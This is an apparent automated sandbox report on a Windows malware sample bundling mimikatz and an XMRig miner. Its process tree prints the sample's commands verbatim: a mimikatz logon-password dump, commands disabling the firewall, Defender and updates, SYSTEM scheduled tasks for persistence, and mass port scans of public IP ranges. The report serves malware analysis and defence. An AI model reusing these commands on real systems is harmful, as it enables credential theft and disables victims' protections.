Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    02-05-2024 04:31

General

  • Target

    2024-05-02_9678346907a855cfe9695d5570d4ddf9_hacktools_icedid_mimikatz.exe

  • Size

    8.7MB

  • MD5

    9678346907a855cfe9695d5570d4ddf9

  • SHA1

    7e3aa484eebf37b4bcdb564da6e94febd39c43fd

  • SHA256

    bc6162b3ee8f11c508a68af4013ee3f7280680a797a4f032ceee63cb16eb9683

  • SHA512

    0a26b5b707f3ac3129695533ffdf1b626578ba6d917177f9da9b8685627a843adf53b9eb042b632f302d9105ec646a8b966fcaf3bd5d8833ef5a6f055f839598

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (27200) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
  • UPX dump on OEP (original entry point) 33 IoCs
  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 6 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Sets file execution options in registry 2 TTPs 40 IoCs
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 22 IoCs
  • UPX packed file 29 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Creates a Windows Service
  • Drops file in System32 directory 12 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 3 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 14 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 31 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1072
      • C:\Windows\TEMP\mlalgeqgl\bacyfi.exe
        "C:\Windows\TEMP\mlalgeqgl\bacyfi.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:492
    • C:\Users\Admin\AppData\Local\Temp\2024-05-02_9678346907a855cfe9695d5570d4ddf9_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-05-02_9678346907a855cfe9695d5570d4ddf9_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2264
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\uczbcelu\bstalsu.exe
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2056
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • Runs ping.exe
          PID:2556
        • C:\Windows\uczbcelu\bstalsu.exe
          C:\Windows\uczbcelu\bstalsu.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2700
    • C:\Windows\uczbcelu\bstalsu.exe
      C:\Windows\uczbcelu\bstalsu.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Sets file execution options in registry
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2620
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2176
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2192
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:2864
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:2604
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                3⤵
                  PID:2640
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:2580
                  • C:\Windows\SysWOW64\cacls.exe
                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                    3⤵
                      PID:2752
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static del all
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:2496
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add policy name=Bastards description=FuckingBastards
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:3056
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filteraction name=BastardsList action=block
                    2⤵
                      PID:2524
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c C:\Windows\apaubnhnu\liyusunlc\wpcap.exe /S
                      2⤵
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:2552
                      • C:\Windows\apaubnhnu\liyusunlc\wpcap.exe
                        C:\Windows\apaubnhnu\liyusunlc\wpcap.exe /S
                        3⤵
                        • Drops file in Drivers directory
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Drops file in System32 directory
                        • Drops file in Program Files directory
                        • Suspicious use of WriteProcessMemory
                        PID:1432
                        • C:\Windows\SysWOW64\net.exe
                          net stop "Boundary Meter"
                          4⤵
                            PID:1780
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop "Boundary Meter"
                              5⤵
                                PID:304
                            • C:\Windows\SysWOW64\net.exe
                              net stop "TrueSight Meter"
                              4⤵
                                PID:624
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop "TrueSight Meter"
                                  5⤵
                                    PID:1356
                                • C:\Windows\SysWOW64\net.exe
                                  net stop npf
                                  4⤵
                                    PID:856
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop npf
                                      5⤵
                                        PID:2836
                                    • C:\Windows\SysWOW64\net.exe
                                      net start npf
                                      4⤵
                                        PID:2316
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 start npf
                                          5⤵
                                            PID:2952
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c net start npf
                                      2⤵
                                        PID:1948
                                        • C:\Windows\SysWOW64\net.exe
                                          net start npf
                                          3⤵
                                            PID:1528
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 start npf
                                              4⤵
                                                PID:1924
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c net start npf
                                            2⤵
                                              PID:2356
                                              • C:\Windows\SysWOW64\net.exe
                                                net start npf
                                                3⤵
                                                  PID:2840
                                                  • C:\Windows\SysWOW64\net1.exe
                                                    C:\Windows\system32\net1 start npf
                                                    4⤵
                                                      PID:532
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c C:\Windows\apaubnhnu\liyusunlc\ilclyhugu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\apaubnhnu\liyusunlc\Scant.txt
                                                  2⤵
                                                  • Loads dropped DLL
                                                  PID:980
                                                  • C:\Windows\apaubnhnu\liyusunlc\ilclyhugu.exe
                                                    C:\Windows\apaubnhnu\liyusunlc\ilclyhugu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\apaubnhnu\liyusunlc\Scant.txt
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:292
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c C:\Windows\apaubnhnu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\apaubnhnu\Corporate\log.txt
                                                  2⤵
                                                  • Loads dropped DLL
                                                  • Drops file in Windows directory
                                                  PID:1292
                                                  • C:\Windows\apaubnhnu\Corporate\vfshost.exe
                                                    C:\Windows\apaubnhnu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2400
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fczbteigz" /ru system /tr "cmd /c C:\Windows\ime\bstalsu.exe"
                                                  2⤵
                                                    PID:2112
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                      3⤵
                                                        PID:2208
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /create /sc minute /mo 1 /tn "fczbteigz" /ru system /tr "cmd /c C:\Windows\ime\bstalsu.exe"
                                                        3⤵
                                                        • Creates scheduled task(s)
                                                        PID:2260
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "cecmluuiq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uczbcelu\bstalsu.exe /p everyone:F"
                                                      2⤵
                                                        PID:1668
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                          3⤵
                                                            PID:1968
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /sc minute /mo 1 /tn "cecmluuiq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uczbcelu\bstalsu.exe /p everyone:F"
                                                            3⤵
                                                            • Creates scheduled task(s)
                                                            PID:2276
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "eiihnyruh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\mlalgeqgl\bacyfi.exe /p everyone:F"
                                                          2⤵
                                                            PID:1672
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                              3⤵
                                                                PID:1176
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /create /sc minute /mo 1 /tn "eiihnyruh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\mlalgeqgl\bacyfi.exe /p everyone:F"
                                                                3⤵
                                                                • Creates scheduled task(s)
                                                                PID:2060
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                              2⤵
                                                                PID:656
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                                2⤵
                                                                • Modifies data under HKEY_USERS
                                                                PID:1560
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                2⤵
                                                                  PID:1860
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static set policy name=Bastards assign=y
                                                                  2⤵
                                                                    PID:1444
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                                    2⤵
                                                                    • Modifies data under HKEY_USERS
                                                                    PID:2756
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                                    2⤵
                                                                      PID:2864
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                      2⤵
                                                                      • Modifies data under HKEY_USERS
                                                                      PID:2776
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh ipsec static set policy name=Bastards assign=y
                                                                      2⤵
                                                                      • Modifies data under HKEY_USERS
                                                                      PID:2536
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                                      2⤵
                                                                        PID:2992
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                                        2⤵
                                                                        • Modifies data under HKEY_USERS
                                                                        PID:2532
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                        2⤵
                                                                          PID:2380
                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                          netsh ipsec static set policy name=Bastards assign=y
                                                                          2⤵
                                                                            PID:1572
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /c net stop SharedAccess
                                                                            2⤵
                                                                              PID:1536
                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                net stop SharedAccess
                                                                                3⤵
                                                                                  PID:1656
                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                    C:\Windows\system32\net1 stop SharedAccess
                                                                                    4⤵
                                                                                      PID:1112
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c netsh firewall set opmode mode=disable
                                                                                  2⤵
                                                                                    PID:1764
                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                      netsh firewall set opmode mode=disable
                                                                                      3⤵
                                                                                      • Modifies Windows Firewall
                                                                                      • Modifies data under HKEY_USERS
                                                                                      PID:1760
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd /c netsh Advfirewall set allprofiles state off
                                                                                    2⤵
                                                                                      PID:624
                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                        netsh Advfirewall set allprofiles state off
                                                                                        3⤵
                                                                                        • Modifies Windows Firewall
                                                                                        PID:340
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c net stop MpsSvc
                                                                                      2⤵
                                                                                        PID:2032
                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                          net stop MpsSvc
                                                                                          3⤵
                                                                                            PID:1908
                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                              C:\Windows\system32\net1 stop MpsSvc
                                                                                              4⤵
                                                                                                PID:1952
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c net stop WinDefend
                                                                                            2⤵
                                                                                              PID:1204
                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                net stop WinDefend
                                                                                                3⤵
                                                                                                  PID:1916
                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                    C:\Windows\system32\net1 stop WinDefend
                                                                                                    4⤵
                                                                                                      PID:1928
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd /c net stop wuauserv
                                                                                                  2⤵
                                                                                                    PID:1240
                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                      net stop wuauserv
                                                                                                      3⤵
                                                                                                        PID:1592
                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                          C:\Windows\system32\net1 stop wuauserv
                                                                                                          4⤵
                                                                                                            PID:320
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /c sc config MpsSvc start= disabled
                                                                                                        2⤵
                                                                                                          PID:1680
                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                            sc config MpsSvc start= disabled
                                                                                                            3⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:1880
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd /c sc config SharedAccess start= disabled
                                                                                                          2⤵
                                                                                                            PID:2968
                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                              sc config SharedAccess start= disabled
                                                                                                              3⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:1932
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd /c sc config WinDefend start= disabled
                                                                                                            2⤵
                                                                                                              PID:1776
                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                sc config WinDefend start= disabled
                                                                                                                3⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:1528
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd /c sc config wuauserv start= disabled
                                                                                                              2⤵
                                                                                                                PID:2964
                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                  sc config wuauserv start= disabled
                                                                                                                  3⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:2448
                                                                                                              • C:\Windows\TEMP\xohudmc.exe
                                                                                                                C:\Windows\TEMP\xohudmc.exe
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Drops file in System32 directory
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:388
                                                                                                              • C:\Windows\TEMP\apaubnhnu\gelcitubi.exe
                                                                                                                C:\Windows\TEMP\apaubnhnu\gelcitubi.exe -accepteula -mp 1036 C:\Windows\TEMP\apaubnhnu\1036.dmp
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:2816
                                                                                                              • C:\Windows\TEMP\apaubnhnu\gelcitubi.exe
                                                                                                                C:\Windows\TEMP\apaubnhnu\gelcitubi.exe -accepteula -mp 1064 C:\Windows\TEMP\apaubnhnu\1064.dmp
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:1660
                                                                                                              • C:\Windows\TEMP\apaubnhnu\gelcitubi.exe
                                                                                                                C:\Windows\TEMP\apaubnhnu\gelcitubi.exe -accepteula -mp 1072 C:\Windows\TEMP\apaubnhnu\1072.dmp
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:1904
                                                                                                              • C:\Windows\TEMP\apaubnhnu\gelcitubi.exe
                                                                                                                C:\Windows\TEMP\apaubnhnu\gelcitubi.exe -accepteula -mp 1912 C:\Windows\TEMP\apaubnhnu\1912.dmp
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:2164
                                                                                                              • C:\Windows\TEMP\apaubnhnu\gelcitubi.exe
                                                                                                                C:\Windows\TEMP\apaubnhnu\gelcitubi.exe -accepteula -mp 2088 C:\Windows\TEMP\apaubnhnu\2088.dmp
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:1636
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd.exe /c C:\Windows\apaubnhnu\liyusunlc\scan.bat
                                                                                                                2⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:2388
                                                                                                                • C:\Windows\apaubnhnu\liyusunlc\eqmguarbb.exe
                                                                                                                  eqmguarbb.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Drops file in Windows directory
                                                                                                                  PID:1476
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                2⤵
                                                                                                                  PID:3832
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                    3⤵
                                                                                                                      PID:1248
                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                                                                      3⤵
                                                                                                                        PID:1400
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                        3⤵
                                                                                                                          PID:748
                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                                                                          3⤵
                                                                                                                            PID:1916
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                            3⤵
                                                                                                                              PID:2988
                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                              3⤵
                                                                                                                                PID:2868
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
                                                                                                                            1⤵
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:1576
                                                                                                                          • C:\Windows\SysWOW64\koaaya.exe
                                                                                                                            C:\Windows\SysWOW64\koaaya.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:1428
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:2672
                                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                                              taskeng.exe {95926B36-36E5-4106-866C-2443329E0B2D} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                              1⤵
                                                                                                                                PID:2076
                                                                                                                                • C:\Windows\system32\cmd.EXE
                                                                                                                                  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\uczbcelu\bstalsu.exe /p everyone:F
                                                                                                                                  2⤵
                                                                                                                                    PID:2764
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                      3⤵
                                                                                                                                        PID:1540
                                                                                                                                      • C:\Windows\system32\cacls.exe
                                                                                                                                        cacls C:\Windows\uczbcelu\bstalsu.exe /p everyone:F
                                                                                                                                        3⤵
                                                                                                                                          PID:2452
                                                                                                                                      • C:\Windows\system32\cmd.EXE
                                                                                                                                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\mlalgeqgl\bacyfi.exe /p everyone:F
                                                                                                                                        2⤵
                                                                                                                                          PID:3016
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                            3⤵
                                                                                                                                              PID:2340
                                                                                                                                            • C:\Windows\system32\cacls.exe
                                                                                                                                              cacls C:\Windows\TEMP\mlalgeqgl\bacyfi.exe /p everyone:F
                                                                                                                                              3⤵
                                                                                                                                                PID:2712
                                                                                                                                            • C:\Windows\system32\cmd.EXE
                                                                                                                                              C:\Windows\system32\cmd.EXE /c C:\Windows\ime\bstalsu.exe
                                                                                                                                              2⤵
                                                                                                                                                PID:2540
                                                                                                                                                • C:\Windows\ime\bstalsu.exe
                                                                                                                                                  C:\Windows\ime\bstalsu.exe
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:904
                                                                                                                                              • C:\Windows\system32\cmd.EXE
                                                                                                                                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\uczbcelu\bstalsu.exe /p everyone:F
                                                                                                                                                2⤵
                                                                                                                                                  PID:2124
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3748
                                                                                                                                                    • C:\Windows\system32\cacls.exe
                                                                                                                                                      cacls C:\Windows\uczbcelu\bstalsu.exe /p everyone:F
                                                                                                                                                      3⤵
                                                                                                                                                        PID:3524
                                                                                                                                                    • C:\Windows\system32\cmd.EXE
                                                                                                                                                      C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\mlalgeqgl\bacyfi.exe /p everyone:F
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2120
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2228
                                                                                                                                                          • C:\Windows\system32\cacls.exe
                                                                                                                                                            cacls C:\Windows\TEMP\mlalgeqgl\bacyfi.exe /p everyone:F
                                                                                                                                                            3⤵
                                                                                                                                                              PID:3360
                                                                                                                                                          • C:\Windows\system32\cmd.EXE
                                                                                                                                                            C:\Windows\system32\cmd.EXE /c C:\Windows\ime\bstalsu.exe
                                                                                                                                                            2⤵
                                                                                                                                                              PID:2912
                                                                                                                                                              • C:\Windows\ime\bstalsu.exe
                                                                                                                                                                C:\Windows\ime\bstalsu.exe
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                PID:3424
                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                            C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                                            1⤵
                                                                                                                                                              PID:2736
                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                              C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                                              1⤵
                                                                                                                                                                PID:572

                                                                                                                                                              Network

                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                              Execution

                                                                                                                                                              Scheduled Task/Job

                                                                                                                                                              1
                                                                                                                                                              T1053

                                                                                                                                                              Persistence

                                                                                                                                                              Create or Modify System Process

                                                                                                                                                              1
                                                                                                                                                              T1543

                                                                                                                                                              Windows Service

                                                                                                                                                              1
                                                                                                                                                              T1543.003

                                                                                                                                                              Boot or Logon Autostart Execution

                                                                                                                                                              1
                                                                                                                                                              T1547

                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                              1
                                                                                                                                                              T1547.001

                                                                                                                                                              Scheduled Task/Job

                                                                                                                                                              1
                                                                                                                                                              T1053

                                                                                                                                                              Privilege Escalation

                                                                                                                                                              Create or Modify System Process

                                                                                                                                                              1
                                                                                                                                                              T1543

                                                                                                                                                              Windows Service

                                                                                                                                                              1
                                                                                                                                                              T1543.003

                                                                                                                                                              Boot or Logon Autostart Execution

                                                                                                                                                              1
                                                                                                                                                              T1547

                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                              1
                                                                                                                                                              T1547.001

                                                                                                                                                              Scheduled Task/Job

                                                                                                                                                              1
                                                                                                                                                              T1053

                                                                                                                                                              Defense Evasion

                                                                                                                                                              Impair Defenses

                                                                                                                                                              1
                                                                                                                                                              T1562

                                                                                                                                                              Disable or Modify System Firewall

                                                                                                                                                              1
                                                                                                                                                              T1562.004

                                                                                                                                                              Modify Registry

                                                                                                                                                              2
                                                                                                                                                              T1112

                                                                                                                                                              Subvert Trust Controls

                                                                                                                                                              1
                                                                                                                                                              T1553

                                                                                                                                                              Install Root Certificate

                                                                                                                                                              1
                                                                                                                                                              T1553.004

                                                                                                                                                              Discovery

                                                                                                                                                              Network Service Discovery

                                                                                                                                                              2
                                                                                                                                                              T1046

                                                                                                                                                              Query Registry

                                                                                                                                                              1
